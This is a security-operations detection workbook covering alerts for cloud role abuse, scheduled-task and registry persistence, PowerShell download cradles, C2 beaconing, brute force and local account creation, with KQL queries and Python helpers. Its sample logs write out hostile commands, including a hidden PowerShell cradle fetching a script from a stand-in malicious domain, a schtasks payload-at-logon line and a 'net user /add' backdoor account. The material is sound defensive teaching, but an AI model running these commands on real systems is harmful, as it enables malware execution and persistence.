Objective: Detect unauthorised or suspicious usage of high-privilege cloud roles from
unexpected users or source IP addresses.
Data Sources:
• AWS CloudTrail
• Azure Activity Logs
• GCP Admin Activity Audit Logs
• Identity provider logs (example, Azure AD sign-ins, Okta, etc.)
Detection Logic (AWS CloudTrail – Example in KQL-like format):
CloudTrail
| where EventName == "AssumeRole"
| extend RoleName = tostring(parse_json(RequestParameters).roleArn)
| where RoleName has_any ("Admin", "PowerUser", "SecurityAudit")
| where SourceIPAddress !in ("known-branch-IP-1", "vpn-gateway-ip", "trusted-user-ip-list")
| summarize Count = count() by UserIdentityArn, RoleName, SourceIPAddress,
    bin(EventTime, 1h)
Logic Summary:
• Flags when high-privilege roles (example, Admin, SecurityAudit) are assumed
• Filters out trusted IPs and expected users
• Ideal when paired with a list of approved users/IP ranges (in Sentinel, a watchlist read with _GetWatchlist())
• Caveat: AssumeRole calls made by AWS services on your behalf carry userIdentity.type "AWSService"; exclude those or the rule drowns in automation noise
MITRE ATT&CK Mapping
Tactic: Privilege Escalation, Persistence
Techniques: T1078.004 – Valid Accounts: Cloud Accounts, T1098.003 – Account Manipulation: Additional Cloud Roles
Explanation:
Attackers with initial access to a cloud account (example, via token theft, OAuth abuse or
credentials) escalate privileges by assuming higher roles in the environment.
Log (AWS CloudTrail Entry)
{
"eventTime": "2025-04-23T11:20:00Z",
"eventName": "AssumeRole",
"userIdentity": {
"type": "IAMUser",
"userName": "lina.firdaus",
"arn": "arn:aws:iam::112233445566:user/lina.firdaus"
},
"sourceIPAddress": "103.122.45.78",
"requestParameters": {
"roleArn": "arn:aws:iam::112233445566:role/AdminAccess"
},
"awsRegion": "us-east-1",
"eventSource": "sts.amazonaws.com"
}
Threat Behavior Indicators
• Use of AssumeRole API with no prior history for the user
• Role assumed from new IP or region (example, assuming SecurityAudit from outside
MY)
• Time-of-day anomalies (example, 3:00 AM login from VPN exit node)
• Multiple AssumeRole attempts across different accounts or services
Response Actions
1. Revoke session/token immediately using AWS/Azure CLI
2. Review all actions performed under the assumed role
3. Restrict role assumption permissions via tighter IAM policy
4. Add conditional logic to IAM policies (IP restriction, device posture)
5. Enable alerts for all privilege-related CloudTrail/Activity Log actions
6. Force MFA re-registration if session hijack is suspected
10. Alert Name: Creation of Scheduled Task by Non-Administrative Account
Alert Logic
Objective: Detect potential persistence mechanisms where a non-admin user creates a
scheduled task a known technique used by malware and threat actors for re-execution.
Data Sources:
• Windows Security Event Logs (Event ID 4698 – scheduled task creation)
• Sysmon (Event ID 1 – process creation for schtasks.exe)
• EDR telemetry
Detection Logic (KQL – Security Event):
SecurityEvent
| where EventID == 4698
| where SubjectUserName !contains "admin" and SubjectUserName !startswith "svc"
| project TimeGenerated, Computer, SubjectUserName, TaskName, TaskContent
Alternate Logic (Sysmon – Process Creation):
Sysmon
| where EventID == 1
| where Image endswith "schtasks.exe"
| where CommandLine has "/create"
| where User !contains "admin" and User !startswith "svc"
Logic Summary:
• Flags when schtasks.exe is used to create a task; 4698 also catches tasks registered through the Task Scheduler API or PowerShell's Register-ScheduledTask, which never spawn schtasks.exe
• In a live 4698 the TaskContent field is the task's XML definition (the <Command> and <Arguments> elements under <Exec>), not a schtasks command line
• Prerequisite: 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled
• Filters out known admin and service accounts
• Can enrich with command line to identify suspicious script paths or payloads
MITRE ATT&CK Mapping
Tactic: Persistence, Execution
Technique: T1053.005 – Scheduled Task/Job: Scheduled Task
Explanation:
Scheduled tasks are a common persistence method, often abused by malware, droppers
or post-exploitation frameworks to ensure code runs on reboot or at specific times.
Log (Event ID 4698 – Windows Security Log)
{
"EventID": 4698,
"TimeGenerated": "2025-04-23T12:05:32Z",
"SubjectUserName": "nabila.rosli",
"TaskName": "\\Microsoft\\Windows\\UpdateMonitor",
"TaskContent": "schtasks.exe /create /tn \"\\Microsoft\\Windows\\UpdateMonitor\" /tr
\"C:\\Users\\nabila\\AppData\\Local\\Temp\\payload.bat\" /sc onlogon /rl highest"
}
Threat Behavior Indicators
• Task pointing to temp folder or AppData location
• schtasks creation from a non-administrative user or via script
• Scheduled task created to run at logon or system startup
• Task content includes base64 PowerShell or obfuscated payloads
Response Actions
1. Extract and analyse task payload file (example, .bat, .ps1)
2. Delete the malicious scheduled task using schtasks /delete
3. Review timeline for other persistence or privilege escalation attempts
4. Investigate whether initial access was achieved via phishing or vulnerability
5. Quarantine host and conduct malware scan or memory forensics
6. Implement AppLocker or WDAC to restrict execution from user-writable paths
11. Alert Name: Registry Autorun Key Modification from Unknown or Suspicious
Parent Process
Alert Logic
Objective: Detect persistence mechanisms where malware or threat actors modify
Windows autorun registry keys often without user awareness.
Data Sources:
• Sysmon (Event ID 13 – Registry value set)
• EDR platforms
• Windows Security logs (if registry auditing is enabled)
Detection Logic (KQL – Sysmon Registry Event Example):
Sysmon
| where EventID == 13
| where TargetObject has_any (
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce"
)
| where Image !endswith "explorer.exe" and Image !endswith "services.exe"
| extend RegistryKey = TargetObject, WrittenValue = Details
| project TimeGenerated, Computer, UserName, Image, RegistryKey, WrittenValue
Logic Summary:
• Flags write operations to known autorun keys
• Filters out benign parent processes (example, explorer.exe, services.exe)
• Captures binary paths or scripts written to registry
MITRE ATT&CK Mapping
Tactic: Persistence
Technique: T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
Explanation:
Adversaries modify autorun keys to re-execute malware every time a user logs in or system
reboots.
Sysmon Log (Event ID 13 – Registry Value Set)
{
"EventID": 13,
"TimeGenerated": "2025-04-23T12:45:20Z",
"UserName": "shahrul.nizam@company.com",
"Image": "C:\\Users\\shahrul\\AppData\\Local\\Temp\\suspicious.exe",
"TargetObject":
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdateHelper",
"Details": "C:\\Users\\shahrul\\AppData\\Roaming\\WinUpdate\\updater.exe"
}
Threat Behavior Indicators
• Autorun registry keys pointing to user-writable folders (AppData, Temp, Roaming)
• Executables launched from unexpected locations or created by abnormal parent
processes
• Registry value includes obfuscated script runners (example, PowerShell, Wscript)
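The indicator lists for alerts 10 and 11 share one test: does the persistence point at a user-writable location, a script runner, or an elevated logon-time trigger? This added example (not part of the workbook) scores both the schtasks command line and the Sysmon Event ID 13 record shown above with a single helper. The path regex, the runner list, the scoring and the function names are constructed; the benign VendorUpdate task is invented for contrast.

```python
import re

# Locations a standard user can write to; persistence that points here is the classic tell
# (assumption: a starting list, ProgramData is included because users can create subfolders there).
USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\(?:appdata|downloads|desktop|documents)|users\\public|programdata|windows\\temp|temp)\\",
    re.IGNORECASE)
SCRIPT_RUNNERS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe")
AUTORUN_KEYS = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(?:once)?\\", re.IGNORECASE)


def is_user_writable(path):
    return bool(USER_WRITABLE.search(path or ""))


def uses_script_runner(command):
    low = (command or "").lower()
    return any(runner in low for runner in SCRIPT_RUNNERS)


def _option(cmdline, flag):
    """Value of a schtasks-style option: /tr "quoted path" or /tr bare-token."""
    m = re.search(re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', cmdline, re.IGNORECASE)
    return (m.group(1) or m.group(2)) if m else None


def analyze_schtasks(cmdline):
    """Score a schtasks.exe /create command line (Sysmon 1 CommandLine)."""
    if "/create" not in cmdline.lower():
        return None
    action = _option(cmdline, "/tr") or ""
    schedule = (_option(cmdline, "/sc") or "").lower()
    f = {
        "task_name": _option(cmdline, "/tn"),
        "action": action,
        "schedule": schedule,
        "user_writable_action": is_user_writable(action),
        "script_runner": uses_script_runner(action),
        "runs_highest": bool(re.search(r"/rl\s+highest", cmdline, re.IGNORECASE)),
        "logon_or_boot": schedule in ("onlogon", "onstart"),
    }
    f["score"] = sum(int(f[k]) for k in
                     ("user_writable_action", "script_runner", "runs_highest", "logon_or_boot"))
    return f


def analyze_autorun(event):
    """Score a Sysmon Event ID 13 write to a Run/RunOnce key."""
    target = event.get("TargetObject", "")
    if not AUTORUN_KEYS.search(target):
        return None
    payload = event.get("Details", "")
    writer = event.get("Image", "")
    f = {
        "hive": target.split("\\", 1)[0].upper(),
        "value_name": target.rsplit("\\", 1)[-1],
        "payload": payload,
        "user_writable_payload": is_user_writable(payload),
        "user_writable_writer": is_user_writable(writer),   # the writer itself runs from a drop location
        "script_runner": uses_script_runner(payload),
    }
    f["score"] = sum(int(f[k]) for k in ("user_writable_payload", "user_writable_writer", "script_runner"))
    return f


# Constructed samples with the same shape as the two log entries above.
SAMPLE_SCHTASKS = (r'schtasks.exe /create /tn "\Microsoft\Windows\UpdateMonitor" '
                   r'/tr "C:\Users\nabila\AppData\Local\Temp\payload.bat" /sc onlogon /rl highest')
SAMPLE_AUTORUN = {
    "EventID": 13,
    "Image": r"C:\Users\shahrul\AppData\Local\Temp\suspicious.exe",
    "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdateHelper",
    "Details": r"C:\Users\shahrul\AppData\Roaming\WinUpdate\updater.exe",
}
# A legitimate-looking task: vendor binary under Program Files, daily schedule, no elevation.
BENIGN_SCHTASKS = r'schtasks.exe /create /tn "VendorUpdate" /tr "C:\Program Files\Vendor\update.exe" /sc daily /st 03:00'

if __name__ == "__main__":
    print(analyze_schtasks(SAMPLE_SCHTASKS))
    print(analyze_autorun(SAMPLE_AUTORUN))
```

A score of 0 is the normal case for software updaters; anything at 2 or above with a user-writable path is worth an analyst's time, and the task_name or value_name masquerading as a Windows component (UpdateMonitor, WindowsUpdateHelper) is the social-engineering half of the same trick.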
Response Actions
1. Delete the malicious autorun registry key using Regedit or reg delete
2. Extract and analyse the referenced file path for malware
3. Check parent process lineage and initial dropper activity
4. Enable registry auditing for high-value keys if not already enabled
5. Use GPO or endpoint protection to block autorun key modifications by users
6. Search for similar registry key patterns across other endpoints
12. Alert Name: PowerShell Download and Execution from External URL
Alert Logic
Objective: Detect execution of PowerShell commands that download remote content
typically used in fileless malware, droppers and initial access stages.
Data Sources:
• Sysmon (Event ID 1 – Process Creation)
• EDR (Microsoft Defender, CrowdStrike, SentinelOne)
• Windows PowerShell logs (Event ID 4104 – ScriptBlockLogging)
Detection Logic (KQL – Sysmon + EDR Process Creation):
DeviceProcessEvents
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("Invoke-WebRequest", "Invoke-Expression", "IEX",
    "DownloadString", "DownloadFile", "Net.WebClient", "curl", "wget")
| where ProcessCommandLine has "http"
| extend Alert = "PowerShell downloading code from external URL"
Alternate Detection (PowerShell ScriptBlock Logging):
// 4104 is written to Microsoft-Windows-PowerShell/Operational, not the Security log,
// so in Sentinel it lands in the Event table rather than SecurityEvent
Event
| where Source == "Microsoft-Windows-PowerShell" and EventID == 4104
| where RenderedDescription has_any ("DownloadString", "Invoke-Expression", "IEX", "http")
Logic Summary:
• Command-line matching catches cradles passed in clear text
• Script block logging also catches cradles hidden behind -EncodedCommand, which the command-line query misses unless the Base64 blob is decoded first
MITRE ATT&CK Mapping
Tactic: Execution, Command and Control
Techniques: T1059.001 – Command and Scripting Interpreter: PowerShell
T1105 – Ingress Tool Transfer
Explanation:
Threat actors often use PowerShell to download payloads directly into memory using
Invoke-WebRequest, IEX or DownloadString to avoid writing files to disk.
Sysmon Log (Event ID 1 – PowerShell Process Creation)
{
"EventID": 1,
"TimeGenerated": "2025-04-23T13:10:55Z",
"UserName": "syafiq.rahman@company.com",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "powershell.exe -nop -w hidden -c IEX (New-Object
Net.WebClient).DownloadString('http://maliciousdomain.com/payload.ps1')",
"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
}
Threat Behavior Indicators
• PowerShell execution with -nop -w hidden or obfuscated command line
• Use of DownloadString, Invoke-WebRequest, curl or wget in PowerShell
• Script sourced from a suspicious or newly registered domain
• Execution with no corresponding disk file artifacts (memory-only)
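Alert 4 and alert 12 meet in one record: an Office parent launching powershell.exe with -enc, where the download cradle only becomes visible after the Base64/UTF-16LE argument is decoded. This added example (not part of the workbook) decodes the encoded command and scores the result against the indicators listed for both alerts. The sample events, the cradle regex, the -e/-ec/-enc prefix handling and the function names are constructed for illustration.

```python
import base64
import re

# Download-cradle primitives from the two alerts (assumption: a starting list, not exhaustive).
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression|"
    r"Net\.WebClient|Start-BitsTransfer|Invoke-RestMethod|\bcurl\b|\bwget\b",
    re.IGNORECASE)
URL_PATTERN = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand; the argument is Base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe")


def encode_command(script):
    """Produce the -EncodedCommand form of a script (used here to build the constructed sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -enc <base64>, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_powershell(event):
    """Classify a powershell.exe process-creation event (Sysmon 1 / DeviceProcessEvents shape)."""
    cmdline = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    decoded = decode_encoded_command(cmdline)
    # Inspect the real script, not the Base64 blob, so cradles hidden behind -enc still match.
    effective = cmdline if decoded is None else cmdline + " " + decoded
    f = {
        "encoded": decoded is not None,
        "decoded_script": decoded,
        "hidden_window": bool(HIDDEN_WINDOW.search(cmdline)),
        "download_cradle": bool(DOWNLOAD_CRADLE.search(effective)),
        "urls": URL_PATTERN.findall(effective),
        "office_parent": parent.endswith(OFFICE_PARENTS),
    }
    f["score"] = (sum(int(f[k]) for k in ("encoded", "hidden_window", "download_cradle", "office_parent"))
                  + int(bool(f["urls"])))
    return f


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://maliciousdomain.com/payload.ps1')"

# Constructed events: the first combines alert 4's Office parent with alert 12's cradle behind -enc;
# the second is routine administration that should score zero.
MACRO_EVENT = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(CRADLE),
}
ADMIN_EVENT = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "ParentImage": r"C:\Windows\explorer.exe",
    "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
}

if __name__ == "__main__":
    print(analyze_powershell(MACRO_EVENT))
    print(analyze_powershell(ADMIN_EVENT))
```

The decode step is the part most SIEM rules skip: a rule keyed on "DownloadString" in ProcessCommandLine never sees MACRO_EVENT, because the only thing on that command line is a Base64 blob. Running the decoder at ingest (or relying on 4104 script block logs, which record the decoded text) closes that gap.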
Response Actions
1. Immediately isolate the host to prevent lateral movement or C2
2. Block the source URL/IP at proxy, DNS and perimeter firewall
3. Extract and sandbox the remote script for malware analysis
4. Enable Constrained Language Mode or Defender ASR to block script abuse
5. Hunt for similar PowerShell command patterns across other endpoints
6. Enable PowerShell logging (module, script block, transcription) in enterprise GPO
13. Alert Name: Suspicious Beaconing to Known Malicious Command and Control (C2)
Domain
Alert Logic
Objective: Detect beaconing activity to known C2 infrastructure which often involves
regular, repeated connections to a remote domain or IP with low data volume.
Data Sources:
• Firewall logs (example, Palo Alto, Fortinet, Cisco ASA)
• DNS logs (example, Zeek, Infoblox)
• Proxy logs
• Threat Intelligence feeds (VirusTotal, BrightCloud, AlienVault OTX)
Detection Logic (KQL – Proxy or DNS Traffic + Threat Intel):
let c2_domains = ThreatIntelligenceIndicator
| where Active == true and isnotempty(DomainName)
| distinct DomainName;
CommonSecurityLog
| where DestinationHostName in (c2_domains)
| summarize ConnectionCount = count(), AvgBytesOut = avg(SentBytes), FirstSeen =
    min(TimeGenerated), LastSeen = max(TimeGenerated) by SourceIP, DestinationHostName
| where ConnectionCount > 20 and AvgBytesOut < 5000
Logic Summary:
• Frequent connections to known C2 domains
• Beacon-like behaviour: regular intervals, small payload sizes
• Uses threat intel to match against known C2 IOCs (the ThreatIntelligenceIndicator table in Sentinel; a watchlist works as well)
MITRE ATT&CK Mapping
Tactic: Command and Control
Technique: T1071 – Application Layer Protocol
Sub-techniques: T1071.001 (Web Protocols), T1071.002 (File Transfer Protocols), T1071.003 (Mail Protocols), T1071.004 (DNS); custom binary protocols fall under T1095 (Non-Application Layer Protocol)
Explanation:
C2 beaconing is used by malware to check in with the attacker, await instructions or
exfiltrate small packets of data.
Firewall Log Entry
{
"TimeGenerated": "2025-04-23T13:35:11Z",
"SourceIP": "10.100.23.50",
"DestinationIP": "94.142.241.111",
"DestinationDomain": "panel.backconnect-server[.]com",
"DestinationPort": 80,
"SentBytes": 379,
"ReceivedBytes": 921,
"DeviceName": "HQ-FW01",
"Action": "Allowed",
"Category": "C2/Beaconing",
"ThreatIntelHit": "Yes"
}
Threat Behavior Indicators
• Small-sized outbound connections on fixed intervals (example, every 60s)
• Rare or first-seen domains
• Connections to domains with poor or newly registered reputations
• No corresponding inbound responses or high-entropy domain names
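The "fixed interval, small payload" indicator measured directly, as an added example that is not part of the workbook. Where the KQL only counts connections to domains already on a threat-intel list, this scores timing regularity (coefficient of variation of the inter-arrival gaps) so a beacon to a domain not yet in the feed still surfaces, and records the intel hit as an enrichment. The flow records, the ±2 s jitter, the 0.25 CV cutoff and the function names are constructed; the 20-connection and 5000-byte thresholds are the workbook's.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"


def beacon_stats(timestamps, sent_bytes):
    """Inter-arrival regularity and payload size for one (source, destination) pair."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean_gap = statistics.mean(gaps)
    # Coefficient of variation: near 0 for a fixed timer, larger as jitter or human activity grows.
    cv = statistics.pstdev(gaps) / mean_gap if mean_gap > 0 else float("inf")
    return {"connections": len(ts), "mean_interval_s": round(mean_gap, 1),
            "interval_cv": round(cv, 3), "avg_bytes_out": round(statistics.mean(sent_bytes))}


def detect_beaconing(flows, min_connections=20, max_cv=0.25, max_avg_bytes=5000, ti_domains=()):
    """Flag source/destination pairs that connect on a regular timer with small payloads.

    Thresholds are assumptions; tune max_cv upward if the malware family adds jitter.
    """
    pairs = defaultdict(lambda: {"times": [], "bytes": []})
    for f in flows:
        p = pairs[(f["SourceIP"], f["DestinationDomain"])]
        p["times"].append(datetime.strptime(f["TimeGenerated"], TIME_FMT))
        p["bytes"].append(f["SentBytes"])

    alerts = []
    for (src, dst), p in pairs.items():
        if len(p["times"]) < min_connections:
            continue
        s = beacon_stats(p["times"], p["bytes"])
        if s["interval_cv"] <= max_cv and s["avg_bytes_out"] <= max_avg_bytes:
            alerts.append({"source_ip": src, "destination": dst,
                           "threat_intel_hit": dst in ti_domains, **s})
    return alerts


def _constructed_flows():
    """Constructed firewall records: a 60 s beacon with small jitter, and bursty browsing."""
    flows = []
    start = datetime(2025, 4, 23, 13, 0, 0)
    for i in range(30):
        jitter = (2, -2, 1, -1, 0)[i % 5]
        flows.append({"TimeGenerated": (start + timedelta(seconds=60 * i + jitter)).strftime(TIME_FMT),
                      "SourceIP": "10.100.23.50", "DestinationDomain": "panel.backconnect-server.com",
                      "SentBytes": 379 + (i % 3) * 8})
    t = start
    for i, gap in enumerate((3, 1, 2, 240, 5, 1, 600, 2, 3, 1, 900, 4, 1, 2, 30, 1, 1200, 3, 2, 5, 7, 1, 1)):
        t += timedelta(seconds=gap)
        flows.append({"TimeGenerated": t.strftime(TIME_FMT), "SourceIP": "10.100.23.51",
                      "DestinationDomain": "cdn.example-news.com", "SentBytes": 1200 + i * 300})
    return flows


SAMPLE_FLOWS = _constructed_flows()

if __name__ == "__main__":
    for alert in detect_beaconing(SAMPLE_FLOWS, ti_domains={"panel.backconnect-server.com"}):
        print(alert)
```

The browsing host makes more than 20 connections with an average request under 5000 bytes too; what separates it from the beacon is the interval_cv, which is why the volume-only KQL needs the threat-intel join to stay usable while the timing version does not.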
Response Actions
1. Block the domain/IP at DNS, proxy and firewall levels
2. Investigate the internal source IP for signs of malware (EDR scan, memory analysis)
3. Correlate with process ID or hash if endpoint telemetry is available
4. Review historical traffic to determine dwell time and scope
5. Use sandbox or TI to classify the C2 infrastructure (example, malware family)
6. Add detection for similar patterns (example, periodic traffic to uncommon TLDs)
14. Alert Name: Excessive Failed Login Attempts Followed by a Successful Login
Alert Logic
Objective: Detect brute-force or password-spraying behaviour where an attacker attempts
multiple failed logins and eventually succeeds.
Data Sources:
• Windows Security Logs (Event IDs: 4625 for failed, 4624 for successful logins)
• Identity provider logs (example, Azure AD, Okta, G Suite)
• VPN or authentication gateway logs
Detection Logic (KQL – SecurityEvent + Time Correlation):
let FailedLogins = SecurityEvent
| where EventID == 4625
| summarize FailedCount = count(), FailedIPs = make_list(IpAddress), FirstFail = min(TimeGenerated), LastFail = max(TimeGenerated) by TargetUserName
| where FailedCount >= 10;
let SuccessfulLogins = SecurityEvent
| where EventID == 4624
| project TargetUserName, SuccessTime = TimeGenerated, SuccessIP = IpAddress;
FailedLogins
| join kind=inner (SuccessfulLogins) on TargetUserName
| where SuccessTime between (FirstFail .. (LastFail + 30m))
| extend Alert = "Multiple failed login attempts followed by successful login"
Logic Summary:
• Detects ≥10 failed login attempts for a user
• Followed by a successful login from same or related IP within a short time window
(example, 30 minutes)
• Useful for identifying brute-force, credential stuffing or password reuse
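The correlation above can also be done statefully as events stream in, which avoids the join re-scanning every 4624. The Python below is an added example and not the workbook's rule; the 4625/4624 events are constructed, and the window is a sliding 30 minutes before each successful logon rather than the FirstFail..LastFail + 30m range used in the KQL above. It covers the three outcomes a practitioner wants to see: a burst that triggers, a handful of typos that does not, and a burst whose success comes too late to count.

```python
"""Added example: stateful correlation of failed logons followed by success.

Not part of the workbook. The events are constructed; the window is a sliding
30 minutes before each successful logon.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta


def parse_ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def _event(event_id, when, user, ip):
    return {"EventID": event_id, "TimeGenerated": when.isoformat() + "Z",
            "TargetUserName": user, "IpAddress": ip}


def build_sample_events():
    """Constructed 4625/4624 events covering three cases."""
    events = []
    # Case 1: 15 failures in ~10 minutes, then success from the same IP -> alert.
    start = datetime(2025, 4, 23, 13, 50, 5)
    for i in range(15):
        events.append(_event(4625, start + timedelta(seconds=40 * i), "hafizul.azmi", "198.51.100.55"))
    events.append(_event(4624, datetime(2025, 4, 23, 14, 3, 12), "hafizul.azmi", "198.51.100.55"))
    # Case 2: three typos then success -> below threshold, no alert.
    start = datetime(2025, 4, 23, 9, 1, 0)
    for i in range(3):
        events.append(_event(4625, start + timedelta(seconds=20 * i), "nadia.omar", "10.20.0.14"))
    events.append(_event(4624, start + timedelta(minutes=2), "nadia.omar", "10.20.0.14"))
    # Case 3: 12 failures, but the success comes two hours later -> outside the window.
    start = datetime(2025, 4, 23, 12, 0, 0)
    for i in range(12):
        events.append(_event(4625, start + timedelta(seconds=30 * i), "farhan.idris", "203.0.113.9"))
    events.append(_event(4624, start + timedelta(hours=2), "farhan.idris", "10.20.0.31"))
    return events


def correlate_logins(events, min_failures=10, window=timedelta(minutes=30)):
    """Emit an alert when a 4624 for a user is preceded by >= min_failures 4625s
    within `window`. Failures older than the window are discarded as events stream in."""
    failures = defaultdict(deque)           # user -> deque of (time, ip), oldest first
    alerts = []
    for ev in sorted(events, key=lambda e: parse_ts(e["TimeGenerated"])):
        t = parse_ts(ev["TimeGenerated"])
        user = ev["TargetUserName"]
        recent = failures[user]
        while recent and t - recent[0][0] > window:
            recent.popleft()                # expire failures outside the sliding window
        if ev["EventID"] == 4625:
            recent.append((t, ev["IpAddress"]))
        elif ev["EventID"] == 4624 and len(recent) >= min_failures:
            failed_ips = {ip for _, ip in recent}
            alerts.append({
                "TargetUserName": user,
                "FailedCount": len(recent),
                "FailedIPs": sorted(failed_ips),
                "SuccessIP": ev["IpAddress"],
                "SameSourceIP": ev["IpAddress"] in failed_ips,
                "FirstFail": recent[0][0].isoformat(),
                "SuccessTime": t.isoformat(),
            })
            recent.clear()                  # one alert per burst
    return alerts


if __name__ == "__main__":
    for alert in correlate_logins(build_sample_events()):
        print(alert)
```

The SameSourceIP field is what separates a single-source brute force from password reuse after a breach elsewhere (failures from one IP, success from another); both are worth a ticket, but the triage path differs.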
MITRE ATT&CK Mapping
Tactic: Credential Access
Techniques: T1110.001 – Brute Force: Password Guessing; T1078 – Valid Accounts
Explanation:
A common attack method where stolen or weak passwords are tried in bulk until a
successful authentication is achieved.
Windows Security Log Snippets
Event ID 4625 – Failed Logon
{
"EventID": 4625,
"TimeGenerated": "2025-04-23T13:50:05Z",
"TargetUserName": "hafizul.azmi",
"LogonType": 2,
"IpAddress": "198.51.100.55",
"Status": "0xC000006A",
"FailureReason": "Unknown user name or bad password"
}
(Repeated 15 times over ~10 minutes)
Event ID 4624 – Successful Logon
{
"EventID": 4624,
"TimeGenerated": "2025-04-23T14:03:12Z",
"TargetUserName": "hafizul.azmi",
"LogonType": 2,
"IpAddress": "198.51.100.55",
"Status": "0x0"
}
Threat Behavior Indicators
• Clustered failed attempts followed by a successful login from same or nearby IP
• Common usernames targeted across multiple systems (indicates spraying)
• Follow-up activity like privilege escalation, credential dumping or persistence setup
Response Actions
1. Reset the user password immediately and enforce MFA (if not enabled)
2. Isolate the machine (if the login was via RDP or physical terminal)
3. Hunt for lateral movement and recent file access or privilege escalation attempts
4. Block source IP if malicious or non-corporate
5. Review user activity post-login to check for suspicious behaviour
6. Implement lockout policies or rate-limiting on authentication services
15. Alert Name: Local Account Creation on Endpoint Outside of Provisioning Process
Alert Logic
Objective: Detect unauthorised or suspicious creation of local user accounts, which may
be used for persistence or privilege escalation.
Data Sources:
• Windows Security Logs (Event ID 4720 – user account creation)
• Sysmon (Event ID 1 – process creation of net.exe, net1.exe)
• EDR telemetry (example, CrowdStrike, Defender ATP)
Detection Logic (KQL – SecurityEvent with Exception Logic):
SecurityEvent
| where EventID == 4720
| where SubjectUserName !contains "admin" and SubjectUserName !startswith "svc"
| where TargetUserName !in ("corporate-template-user", "imaging-account")
| extend Alert = "Local user account created by unexpected user"
Alternate Logic (Sysmon – Detect Account Creation via Net Command):
Sysmon
| where EventID == 1
| where ProcessCommandLine has "net user" and ProcessCommandLine has "/add"
| where InitiatingProcessAccountName !contains "admin" and InitiatingProcessAccountName !startswith "svc"
MITRE ATT&CK Mapping
Tactic: Persistence, Privilege Escalation
Techniques: T1136.001 – Create Account: Local Account; T1078.001 – Valid Accounts: Local Accounts
Explanation:
Adversaries often create local user accounts to maintain access on a compromised host,
especially when domain access is lost or unnecessary.
Windows Security Log (Event ID 4720)
{
"EventID": 4720,
"TimeGenerated": "2025-04-23T14:20:42Z",
"SubjectUserName": "amir.rahim@company.com",
"TargetUserName": "support_backup",
"AccountDomain": "WORKGROUP",
"WorkstationName": "DESKTOP-0211HR",
"Privileges": "User",
"AccountCreated": "support_backup"
}
Sysmon Log (Event ID 1 – Process Creation)
{
"EventID": 1,
"TimeGenerated": "2025-04-23T14:21:10Z",
"UserName": "amir.rahim",
"Image": "C:\\Windows\\System32\\net.exe",
"CommandLine": "net user support_backup P@ssw0rd123 /add",
"ParentImage": "C:\\Windows\\System32\\cmd.exe"
}
Threat Behavior Indicators
• Account creation from a non-IT or non-automated user
• Local-only accounts (non-domain) with privileged permissions
• Accounts named generically (example, backup, admin2, svcuser)
• Process lineage from script engines or LOLBINs
Response Actions
1. Disable or delete the suspicious local account
2. Check for follow-up actions by the account (example, service installs, logon
activity)
3. Investigate how the user gained the ability to create accounts
4. Review group memberships (especially if added to local administrators)
5. Deploy EDR rule to monitor net user /add and New-LocalUser commands
6. Harden provisioning process using LAPS, domain-only accounts and endpoint
hardening GPOs
16. Alert Name: Unusual Volume of File Encryption Activity (Potential Ransomware)
Alert Logic
Objective: Detect ransomware behaviour based on rapid encryption of a high volume of
files, especially on mapped drives or shared folders.
Data Sources:
• EDR (Microsoft Defender for Endpoint, CrowdStrike, SentinelOne)
• File system activity monitoring (Sysmon Event ID 11 – File Create)
• Network share logs
• File Integrity Monitoring (FIM)
Detection Logic (EDR/Sysmon Hybrid – KQL Style):
DeviceFileEvents
| where ActionType == "FileModified"
| where FileName matches regex @"(?i)\.(docx|xlsx|pdf|zip|jpg)$"
| summarize ModifiedCount = count(), DistinctFiles = dcount(FileName) by DeviceName, InitiatingProcessAccountName, bin(Timestamp, 5m)
| where ModifiedCount > 100 and DistinctFiles > 80
